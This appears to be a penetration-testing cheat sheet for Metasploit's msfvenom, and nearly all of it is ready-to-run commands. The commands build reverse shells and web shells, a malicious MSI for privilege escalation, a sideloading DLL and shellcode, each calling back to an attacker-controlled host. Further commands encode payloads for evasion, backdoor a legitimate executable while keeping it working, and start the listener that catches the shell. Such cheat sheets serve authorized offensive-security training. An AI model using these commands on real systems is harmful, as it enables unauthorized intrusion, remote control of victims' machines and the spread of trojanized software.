msfvenom Cheat Sheet
Generate and encode standalone payloads (reverse shells, shellcode, MSI/EXE/ELF) for authorized exploitation.
Overview
msfvenom is Metasploit's payload generator. It combines payload selection, encoding, and output formatting in one command. Use it to build reverse/bind shells in any format (EXE, ELF, MSI, PHP, ASPX, raw shellcode). Pair a reverse payload with a matching multi/handler listener in msfconsole.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Discover payloads and options
List payloads (filter as needed)
msfvenom -l payloads | grep meterpreterList output formats (exe, elf, raw, ...)
msfvenom -l formatsList encoders
msfvenom -l encodersShow a payload's required options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-optionsWindows payloads
64-bit meterpreter EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exeStaged-less plain reverse shell EXE
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exeMSI (AlwaysInstallElevated)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msiDLL for sideloading/hijack
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o evil.dllLinux / web payloads
Linux 64-bit reverse shell ELF
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f elf -o shell.elfPHP reverse shell
msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=443 -f raw -o shell.phpJSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f raw -o shell.jspASPX webshell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f aspx -o shell.aspxShellcode (for exploit dev)
C shellcode, bad chars removed
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f c -b '\x00\x0a\x0d'Python shellcode var named sc
msfvenom -p linux/x86/exec CMD=/bin/sh -f python -v scEncoding & evasion
5 iterations of shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o enc.exeModern AV detects shikata; rely on it for bad-char avoidance, not evasion.
Inject payload into a legit template binary (-x), keep functionality (-k)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -x /usr/share/windows-binaries/plink.exe -k -f exe -o backdoored.exeCatch the shell
One-line multi/handler matching your payload
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.14.5; set LPORT 443; run"Tips
- The handler payload, LHOST, and LPORT must match the generated payload exactly.
- Use staged payloads (.../meterpreter/reverse_tcp) when bandwidth is fine; use stageless (_reverse_tcp with shell) when the stager is blocked.
- 443 and 53 are good LPORT choices — they're commonly allowed outbound.
- Set bad chars with -b when writing into a buffer-overflow exploit.